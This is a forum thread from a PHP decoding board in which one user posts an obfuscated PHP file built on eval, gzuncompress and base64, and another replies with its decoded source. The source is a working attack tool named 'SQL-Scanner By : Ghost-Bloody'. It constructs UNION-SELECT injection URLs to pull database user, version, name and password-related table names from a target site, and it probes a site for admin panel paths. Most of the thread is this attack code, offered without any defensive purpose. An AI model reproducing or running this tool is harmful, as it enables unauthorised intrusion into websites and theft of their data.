|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 51
Members: 0
Total: 51
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
Can anyone decode this code... |
|
Posted: Sat Dec 18, 2010 5:46 pm |
|
|
alsabri |
Beginner |
|
|
Joined: Dec 18, 2010 |
Posts: 2 |
|
|
|
|
|
|
|
Code: | <?php $OOO0O0O00=__FILE__;$O00O00O00=__LINE__;$OO00O0000=1904;eval(gzuncompress(base64_decode('eNplj8duwkAYhF/G0u4qRlmI44AsH+idpbdL5PK7gBu7LsDTBxREhKKZ02jmk0ZilFJ2E9WdOIEIS4yx30BG3EREKzw/AFwqSexevJs4LqQCS8+pXKYVhWj/YoXWVKLdiI+l7l6zyIrDhIMQ2DQEqMq3DVZsAxYpTzl2OBj2C6JKiYzaUQr8EmfF0Zv3dsPJhq2WdaNhNq2W3XG6bt8fHEbBOJwms9NCrPPteX+l5cqH8ql+VWtv7zqSUb3RbLU73V5/MByNJ2w6my+Wq/Vmu9sbpmWD43r+4RiEUZycuEizvDhfXhiIEKJBbgT47xDRfgD5Al8g')));return;?>
GYQYAfsKI0EW/cBaMtxrEmJqy6xkdCvAsLRv6IViHHeQFVmVAsp+vaOjqo9M5MbKmkL5H0HJ+UIQS0tWNNYIW7jIHP53YchmnWNKSDhrnoW8TWt5sPs2ltxOMPFlnAW4CqEQtCHWJOZxHLHJQArGHywwedLAgE6wE6t7yqRubDSpkAwAs7pGacaBkwBBIfnTNZs9QLKMH4J0/Cn9Uqq/Y/aKd91jxTx2uHN48JCXJe0ongBeBqvmBd1n1/KXhMykQ2MKSTfeQ0N1Fyl5BGssbuIinuLwHifHHelJ4wgZFF3/qlk/5iJoPVkVkPns87R6UHd2D/954FZMRg9i2W46POA9xj3Z9e6IX9WsOQSkm69gYM874/TS/KhZFba9F6w3SCpde+1K13Q0G0/9XgecFAgjZbW2b7Z8vvmRwwWPTSj7n02zvyIxRSp1sfm+6au/UyuHhhE5iXKiJIlqm8Q/c1uHTZgxPEr=GYqaoN1v4jd0c5e4u1X3oJEIEfqssrRCgD27UfKsB7v9FQpWUrzjD0iZJUl0ag/3vBF7DTIPn206DD5PCq8Nv+/4Vac9mTwxymzoxIogFfuPYIG16MVBkyrZTlIFkChua2QaVb5r6SYA3EDHJYVC2aUXpdeFYhBjBma40KmAQpNwV20RqZ18FlGqasXPJkwTFmIQnzt5aZIUKuuF66SLMPfGk8NqZQuXTHry7wUC0ZIAmcT/X05w/ziGeIQFp3wHHQWy41G+KtoThNEAox7oFXyHHIkbePn5TVPzq8nirJAGE5OGvhxa0ZjIuIp0GJPyGlOCVAMmIxDXpo1ofAE3GNJcVCRCxnJg/b5+8DMVyVQbtrZ5CEAWTiAEBH9mCaQE6cAJGE2QIyrSGyWrQPBuugsgdfmbwYFpAVyAEqU/pOfo53/81jLuUHIU8vDBmkng/tIamdfnnY4FBIPkTKtZAREr39EfxE2FYRa3CTykJebU/Z2LOO7tMAErRRImgkv+0K1UPmxL0x4lRIVt2Nr8tYn8mSDKh+F5QmUBTdAjHaEkoCprNvuYw5Kqn5Zjw8WcGvZMhepxEm4a2lP30wHPc4k1ixdIISTtA5XszbplJ0XvzWnHL8zwjEL/8MZhapg5wXKaiH4HrIvfWXskOIlov02NWD8dk5jeh0Ccmzc4timFLN5sYjybpYvLuKKgnUmRa6LvOuxJBCvyXMORcxCuzKhix5cM7HF/FOnopCzZ/kpWKiW3Zfa/OtxYApOHR60R1+vVSv3+V69vvMuv9D1bCQ9gjR3VGQZsxKhMhnV9f4tiL5h/AJXxGFeP+tjQQfw20zYxNn7l+mmEcTXuypUIQLIN6VDpd5HJOpUWeuhWI25CLLq2320EPInAMLvdxgBcG808sr7lNqYB/cvxmJm7s9qSMgqMwM9TKAHQAgQNwY4zOcFo3Up3BUD/LKu6NkylZo+bVCeZnhuiIgOgc7DQpplH6bXtk5yFQy8aAykj4cUg12hBh2Qc5Cg2ZX/W7soAD96O549e3hkJ+NnYpSJ10DWeAVhW/ob9255ukDMIocDQxbCafuUB5XaNyWOBpI6NQqtUCDBpAKnDqIPaC4R8B9HLMqa4JnmQPt7jyoqtzeu157618ymtBMPM5BIy/kQ13m1482gj6yB71+V3g8Tu9/k39EpHqAxrbmRIyv9Y0TeXjY0d7tAciEaeSJL+ozT9rpItTj1sVQeYXBH0J0W1y1N50pE82vw8DYkKvzANXTMslEaWH1vE5IAsAhSVgn6EtKuWzL+tf+BrmTryzQIlNHcb0HK60eRE8Tp9HyYzSefbTrBcifmO8D6AyhLCMbTCc6uwkSaGHLDpbWG67VbOG/j7VT0NgdcS4w+DiM/UcqHYSuFwddCiF18MkUTbqnWa9b+BV5Ug1jW3WsKCerQPM3flB2tzSRT9swq5IQ7DsZ7SZuaz5FiSSj9m5wpNw2Z1Uj/n3N/NNIf40gwl2R1JZaQVjqdWx20JW35qyoXcn5oubsOveBqdw9qKBG1tHdOsPYeTT/aG/ThjWIp14i9KOltJFpxV/fhLW2StO/7SlLNGGDjFGCpft/34Y3QgvB9X3mIzupwzk2WnXOVpuU9xaiTdgwlTBdvy6G9XjaYcvFgpYXVslaPc5rAvn9WRlzm11d5qIZUI5UN9lWOkIPg26qeFZt+Pn5Sp7dc8Xn10j04wxkTzCmzBQitGUYjATUPwzizbd2iA6Y2YD3Dqqoj4zNrCpieVPJDpYqOkRWiJOHBY5KfgwFJEaiFjuZ4VzQZG2UNu3BNZHORLyt+nfgGqeT50Jk+XhbjT1wzqal0ZYSrcoxDuljH6AcXKaexky0Pg3SvwR9AylTX0smTLxOvCNU9v8XvdRNlOo7dLPPoo/Og4wgv1 |
|
|
|
|
|
|
|
|
|
Posted: Sun Dec 19, 2010 12:46 am |
|
|
tsabitah |
Valuable expert |
|
|
Joined: Jul 07, 2010 |
Posts: 328 |
Location: surabaya |
|
|
|
|
|
|
Code: | <?php
@set_time_limit(0);
@error_reporting(0);
echo '<style type="text/css">
<!--
body,td,th {
color: #FFFFFF;
}
body {
background-color: #000000;
}
.title {
font-size: 24px;
color: #ffffff;
font-weight: bold;
}
input{
color: #cccccc;
dashed #ffffff;
border: 1px
solid #00FF00;
background-color: #000000
}
-->
</style>';
$inject = $_POST['inject'];
$site = $_POST['site'];
$columns = $_POST['columns'];
$column = $_POST['column'];
$option = $_POST['option'];
$site2 = $_POST['site2'];
$scan = $_POST['scan'];
echo '<title>SQL-Scanner By : Ghost-Bloody</title>
<center>
<font class=title>SQL-Scanner By : Ghost-Bloody<br /><br /></font>
<table width="600" border="1" cellpadding="1" cellspacing="0" bordercolor="#00FF00">
<tr>
<td bgcolor="#003300"><div class=title align=center>SQL injection</div></td>
</tr>
<tr>
<td><br /><center><form method="POST">
<input name="site" type="text" size="40" value="';
if (isset($site)) {
echo $site;
} else {
echo "http://www.example/index.php?id=";
}
echo '">
<input name="columns" type="text" size="2" value="';
if (isset($columns)) {
echo $columns;
} else {
echo "10";
}
echo '">
<input name="column" type="text" size="2" value="';
if (isset($column)) {
echo $column;
} else {
echo "1";
}
echo '">
<table width="200" border="0" cellspacing="0" cellpadding="0">
<tr>
<td>Databas User: </td>
<td><input name="option" type="radio" value="data_user" ';
if ($option == "data_user" or $option !== "data_version" & $option !== "data_name") {
echo "checked";
}
echo '></td>
</tr>
<tr>
<td>Databas Version: </td>
<td><input name="option" type="radio" value="data_version" ';
if ($option == "data_version") {
echo "checked";
}
echo '></td>
</tr>
<tr>
<td>Databas Name: </td>
<td><input name="option" type="radio" value="data_name" ';
if ($option == "data_name") {
echo "checked";
}
echo '></td>
</tr>
<tr>
<td>Table Name: </td>
<td><input name="option" type="radio" value="table_name" ';
if ($option == "table_name") {
echo "checked";
}
echo '></td>
</tr>
</table>
<input name="inject" type="submit" value="Inject">
</form>';
if (isset($inject)) {
//===================================================================================================
if ($option == "data_user") {
//=
//=
$h = "user()";
} elseif ($option == "data_version") {
//=
//=
$h = "version()";
} elseif ($option == "data_name") {
//=
//=
$h = "database()";
} elseif ($option == "table_name") {
//=
//=
$h = "table_name";
//=
$b = "+from+information_schema.columns+where+column_name+like+CHAR(37,112,97,115,115,37)";
}
//=
//===================================================================================================
//=
$n = 1;
//=
$open = fopen("sql.txt", "w");
//=
$write = fwrite($open, $site . "-2+union+select+");
//======================================================================================
while ($n <= $columns) {
//=
//=
$file = file_get_contents("sql.txt");
if ($n == $column) {
//=
//=
$contents = $file . "group_concat(0x3D3D3E,unhex(hex(" . $h . ")),0x3C3D3D),";
}
//=
elseif ($n == $columns) {
//=
//=
$contents = $file . $n . $b;
} else {
//=
//=
$contents = $file . $n . ",";
}
//=
//=
$open = fopen("sql.txt", "w");
//=
$write = fwrite($open, $contents);
//=
$n++;
}
//=
//======================================================================================
//=
$sql = file_get_contents("sql.txt");
//=
$injector = file_get_contents($sql);
//=
$explode = explode("==>", $injector);
//=
$explode = explode("<==", $explode['1']);
//=
echo "<b>" . $explode['0'] . "</b></center><br />";
//===============================================
}
echo '</td>
</tr>
<tr>
<td bgcolor="#003300"><div class=title align=center>Admin Panel Scan</div></td>
</tr>
<tr>
<td><center><br /><form method="POST">
<input name="site2" type="text" size="40" value="';
if (isset($site2)) {
echo $site2;
} else {
echo 'http://www.';
}
echo '">
<input name="scan" type="submit" value="scan">
</form>';
//============================================================================
if (isset($scan)) {
$file = file_get_contents("admin.txt");
$admin = explode("
", $file);
foreach ($admin as $key) {
$header = get_headers($site2 . "/" . $key);
if ($header['0'] !== "HTTP/1.1 404 Not Found") {
echo '<a href="' . $site2 . '/' . $key . '">' . $site2 . '/' . $key . '</a>: Found!<br />';
}
}
}
//============================================================================
echo '</td>
</tr>
</table>
<br /><br /><font class=title>SQL-Scanner By : Ghost-Bloody</font>
</center>';
exit();
?> |
|
|
|
|
|
|
|
|
|
Posted: Sun Dec 19, 2010 5:07 pm |
|
|
alsabri |
Beginner |
|
|
Joined: Dec 18, 2010 |
Posts: 2 |
|
|
|
|
|
|
|
Thank you very much
Excuse me, what is the program that encoded it? |
|
|
|
|
www.waraxe.us Forum Index -> PHP script decode requests
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|